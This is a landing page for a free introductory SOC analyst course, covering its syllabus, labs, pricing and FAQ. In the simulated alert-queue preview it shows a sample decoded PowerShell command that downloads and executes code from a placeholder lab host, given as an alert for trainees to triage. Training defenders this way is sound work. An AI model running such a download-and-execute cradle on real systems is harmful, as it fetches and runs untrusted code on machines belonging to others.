IntroductoryFree3h of content · 2 guided labs200 XP

SOC Analyst: Your First Shift

The entry-level SOC job, taught as the work rather than the job title. Read an alert's six fields, run four triage questions in order, prioritise a queue of forty, enrich an indicator without warning the attacker, and write an escalation ticket that L2 accepts. Free, three hours, no experience assumed.

Free forever. No card, no trial, no expiry.

Preview the student experience

No login · Free interactive demo

Try demo →

2

Guided labs

Isolated VM environment

3h

Of content

Labs + practice + exams + simulations

3

Modules

Progressive difficulty

2–4h

Per lab session

Unlimited restarts

HTKWhat's included
  • The full course: written lessons with diagrams
  • Per-module exams to check what stuck
  • Simulated lab: triage your first shift's queue
  • Submit the final assignment
  • Lifetime access, no card required
  • Isolated lab VM and graded certificate: 24 € unlock
0

No card required

Start free →

Lab tools you will use

ElasticSIEMSysmonEndpoint logsZeekNetworkVirusTotalScannerElasticSIEMSysmonEndpoint logsZeekNetworkVirusTotalScanner
urlscan.ioScannerWHOISReconMITRE ATT&CKFrameworkurlscan.ioScannerWHOISReconMITRE ATT&CKFramework

Before you start — quick answers

The course is free: every lesson, every module quiz, and the simulated lab in module 2 — which is a real triage exercise, not a preview. You need an account, but no card. Two things are paid, and we would rather you knew now: the final lab, which boots a real Linux VM for you, and the human review of your final ticket. That unlock is 24 €, once.

Only with the 24 € unlock. The certificate depends on an instructor grading and passing your escalation ticket, and that review is the paid part. You can write and submit the ticket for free — it simply sits unreviewed until you unlock it.

No. The course assumes you have never seen a SOC console. It does not assume you know what an EDR is, what a proxy log looks like, or what L2 means — all of that is explained the first time it comes up.

No, and they answer different questions. The intro course answers "what is this field, and where might I fit in it". This one answers "what does the entry-level job actually look like on a Tuesday". They overlap very little, and either can come first — though intro is gentler if you are starting from absolute zero.

Course Syllabus

3 modules · 3h of content

Each phase maps to a module in this course. Scroll to see how the curriculum builds, module by module.

1

Module 1

Introductory

What a SOC is and how your work is measured

  • What a SOC actually does — and, just as usefully, what it does not
  • L1, L2 and L3: what each level does and where the handover really happens
  • The three places alerts come from, and how telemetry becomes a rule becomes an alert
  • False positives as the craft's real problem, not an annoyance to complain about
  • The SLA: the clock that actually runs, and the opposite mistake of closing too fast
  • The metrics that measure quality instead of speed — and why they decide what you open first
  • Alert fatigue: the real risk to your judgement, and what you do about it
  • Module exam
2

Module 2

Introductory

Triage — from alert to verdict

  • Anatomy of an alert: the six fields you read every single time
  • The four triage questions, always in this order: is it real, how far does it reach, what is the impact, escalate or close
  • Why skipping questions two and three is forwarding rather than triaging — and why that ticket comes back
  • Priority: ordering forty alerts by asset value, signal confidence and severity
  • Why the severity an alert ships with is an opinion, not a fact
  • Enriching an indicator without contaminating the case or tipping off the attacker
  • Reading what enrichment gives back, and the two traps people fall into
  • Writing the escalation ticket L2 does not send back — a bad one, and the same one done properly
  • Simulated lab: your first shift, plus three module quizzes
3

Module 3

Introductory

The four cases you will see, and where to go next

  • Case 1 — a user reports an email: what to check, and in what order
  • Case 2 — the EDR flags a binary: real detection or noise
  • Case 3 — odd traffic in the small hours: what beaconing looks like
  • Case 4 — an impossible logon: an account used from somewhere it should not be
  • Final lab on a real VM: a full shift on unfiltered logs
  • Final assignment: an escalation ticket, graded on what a real one is judged on
  • How the four alert families map onto specialisms, so you can choose with criteria

What you will learn

  • Explain what an L1, L2 and L3 analyst actually do, and where the handover is
  • Follow an alert back to the telemetry and the rule that produced it
  • Triage an alert with four questions instead of guessing
  • Order a queue of forty alerts by severity, asset value and confidence
  • Enrich an indicator without warning the attacker you are looking
  • Write an escalation ticket that L2 does not send back
  • Recognise the four alert families and pick a specialism with criteria

Hands-on Lab

The simulated lab in module 2 hands you the evidence already trimmed. The final lab does not: you get a Linux VM holding a full day of logs from a fictional organisation — mail, authentication, proxy, EDR and a network capture — unfiltered, with real volume and real noise, and the command-line tools you find anywhere: grep, jq, zeek-cut and a PCAP viewer. The incident inside weaves the module's four cases together: an email opens the door, a binary executes, the host starts talking outbound, and an account ends up used from somewhere it should not be. No single alert tells the whole story. You reconstruct the real order of events — which is not the order the alerts arrived in — measure how many hosts and accounts are affected, extract indicators a network team could block today, and decide what gets contained first and why. Every flag needs two sources cross-referenced; none can be answered from memory.

2⬡ 2 guided labs
2–4hSession window
UnlimitedRestarts
AutoFlag validation
Experience a lab preview →

Requirements

  • ·No prior experience — the course assumes you have never seen a SOC console
  • ·A computer with a browser. Nothing to install: the simulated lab runs in the browser
  • ·Around three hours

What's free, and what the 24 € unlock adds

Said plainly here so nothing surprises you halfway through the course.

Free, with an account

  • Every lesson and module, start to finish
  • Per-module exams, with unlimited retries
  • The guided analysis walkthroughs
  • You can submit the final assignment
See how the simulator works →

Pro unlock

24 €
  • +The real lab: your own isolated VM, launched on demand
  • +An instructor personally reviews and grades your final assignment
  • +The HTK certificate, which requires that graded pass

One payment, no subscription. Buying any paid HTK course includes this unlock, so you never pay for it twice.

And this is exactly what you unlock

No marketing screenshots: the three pieces, as they actually look inside.

1

The real lab

Your own cloud VM, isolated and yours alone, with the tools already installed. You launch it from the browser whenever you want and it is destroyed when you finish.

Sample of the lab panel. The times shown are illustrative.

2

Your assignment, graded by a person

You submit your report and an instructor reads it, scores it out of 100 and writes back what you got right and what is missing. It is not an automated grader. The certificate depends on that grade.

Sample grading. The score and comment are illustrative.

3

The full simulator

A shift on the alert queue, with the clock running: telemetry arrives, a rule fires, the alert lands in your queue and you have to triage it. You practise the decision that defines the job — what to open first, and what is a false positive.

SOC alert queuepaused

Endpoint telemetry

10.4.2.21 WINWORD.EXE opened Factura_Marzo.docm

10.4.2.21 WINWORD.EXE -> spawned powershell.exe

10.4.2.21

RuleEDR-PS-ENC-02match

Queue

0 open

No alerts

Decoded command

IEX (New-Object Net.WebClient).DownloadString('https://telemetry-cdn.htk-lab.invalid/a')

Every clock runs while you investigate, and the severity was set by a rule that did not know which machine it was. Deciding where to start is the exercise.

The real interface of the “SOC alert queue” simulator. Here it plays by itself; with the unlock you work it yourself.

Frequently Asked Questions

Complete answers about this course, labs, certificates, and refunds

The course is free: every lesson, every module quiz, and the simulated lab in module 2 — which is a real triage exercise, not a preview. You need an account, but no card. Two things are paid, and we would rather you knew now: the final lab, which boots a real Linux VM for you, and the human review of your final ticket. That unlock is 24 €, once.

Only with the 24 € unlock. The certificate depends on an instructor grading and passing your escalation ticket, and that review is the paid part. You can write and submit the ticket for free — it simply sits unreviewed until you unlock it.

No. The course assumes you have never seen a SOC console. It does not assume you know what an EDR is, what a proxy log looks like, or what L2 means — all of that is explained the first time it comes up.

No, and they answer different questions. The intro course answers "what is this field, and where might I fit in it". This one answers "what does the entry-level job actually look like on a Tuesday". They overlap very little, and either can come first — though intro is gentler if you are starting from absolute zero.

On its own, no. Three hours will not do that, and anyone promising otherwise is selling something. What it does is let you talk about triage the way the work actually happens, and finish knowing whether the job appeals to you before you invest months in it.

Module 3 is built for exactly that. The four alert families you learn to triage map onto the specialisms in the catalogue — malware, phishing and OSINT, threat hunting, network security — so you choose a direction based on which cases you actually enjoyed working.

No. Any paid HTK course purchase includes the free courses' labs and assignment reviews, so you will never hit a paywall inside a course meant to introduce you to the platform.

After this course

Then pick the specialism that fits you

This course exists to help you choose with some basis instead of guessing. Once you know which side of the field appeals to you, each learning path takes you from beginner to intermediate with the labs to match.

Explore learning paths →
Ready to level up?

Start learning cybersecurity today

Three hours, no prior knowledge, and a real phishing email to take apart. Create an account and begin.

FreeNo card required
No card requiredLifetime accessStart in under a minute